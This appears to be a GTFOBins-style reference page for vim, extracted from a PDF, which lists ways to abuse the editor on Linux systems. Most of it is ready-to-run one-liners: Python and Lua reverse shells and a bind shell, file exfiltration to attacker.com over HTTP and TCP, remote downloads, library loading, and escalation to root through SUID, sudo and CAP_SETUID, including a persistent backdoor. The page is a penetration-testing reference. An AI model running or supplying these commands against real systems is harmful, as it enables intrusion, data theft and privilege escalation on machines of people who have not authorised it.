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Shell Reverse shell Non-interactive reverse shell Non-interactive bind shell File upload
File download File write File read Library load SUID Sudo Capabilities Limited SUID
Shell
It can be used to break out from restricted environments by spawning an interactive
system shell.
(c) This requires that vim is compiled with Python support. Prepend :py3 for Python
3.
vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Reverse shell
It can send back a reverse shell to a listening attacker to open a remote network
access.
This requires that vim is compiled with Python support. Prepend :py3 for Python 3.
Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the
shell.
export RHOST=attacker.com
export RPORT=12345
vim -c ':py import vim,sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
vim.command(":q!")'
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Run nc -l -p 12345 on the attacker box to receive the shell. This requires that vim is
compiled with Lua support and that lua-socket is installed.
export RHOST=attacker.com
export RPORT=12345
vim -c ':lua local s=require("socket"); local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
while true do
local r,x=t:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();'
Run nc target.com 12345on the attacker box to connect to the shell. This requires that
vim is compiled with Lua support and that lua-socket is installed.
export LPORT=12345
vim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
while true do
local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();'
File upload
It can exfiltrate files on the network.
(a) This requires that vim is compiled with Python support. Prepend :py3 for Python
3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP
service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
(b) This requires that vim is compiled with Python support. Prepend :py3 for Python
3. Serve files in the local folder running an HTTP server.
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export LPORT=8888
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
(c) Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box
to collect the file. This requires that vim is compiled with Lua support and that
lua-socket is installed.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
vim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
File download
It can download remote files.
(a) This requires that vim is compiled with Python support. Prepend :py3 for Python
3. Fetch a remote file via HTTP GET request.
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'
(b) Fetch a remote file via TCP. Run nc target.com 12345 < "file_to_send" on the
attacker box to send the file. This requires that vim is compiled with Lua
support and that lua-socket is installed.
export LPORT=12345
export LFILE=file_to_save
vim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
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File write
It writes data to files, it may be used to do privileged writes or write files outside a
restricted file system.
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File read
It reads data from files, it may be used to do privileged reads or disclose files
outside a restricted file system.
vim file_to_read
Library load
It loads shared libraries that may be used to run code in the binary execution
context.
This requires that vim is compiled with Python support. Prepend :py3 for Python 3.
vim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary("lib.so"); vim.command(":q!")'
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and may
be abused to access the file system, escalate or maintain privileged access as a
SUID backdoor. If it is used to run sh -p , omit the -p argument on systems like
Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain
elevated privileges. To interact with an existing SUID binary skip the first command
and run the program using its original path.
This requires that vim is compiled with Python support. Prepend :py3 for Python 3.
./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
Sudo
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If the binary is allowed to run as superuser by sudo , it does not drop the elevated
privileges and may be used to access the file system, escalate or maintain
privileged access.
(b) This requires that vim is compiled with Python support. Prepend :py3 for Python
3.
sudo vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Capabilities
If the binary has the Linux CAP_SETUID capability set or it is executed by another
binary with the capability set, it can be used as a backdoor to maintain privileged
access by manipulating its own process UID.
This requires that vim is compiled with Python support. Prepend :py3 for Python 3.
cp $(which vim) .
sudo setcap cap_setuid+ep vim
./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Limited SUID
If the binary has the SUID bit set, it may be abused to access the file system,
escalate or maintain access with elevated privileges working as a SUID backdoor. If
it is used to run commands (e.g., via system() -like invocations) it only works on
systems like Debian (<= Stretch) that allow the default sh shell to run with SUID
privileges.
This example creates a local SUID copy of the binary and runs it to maintain
elevated privileges. To interact with an existing SUID binary skip the first command
and run the program using its original path.
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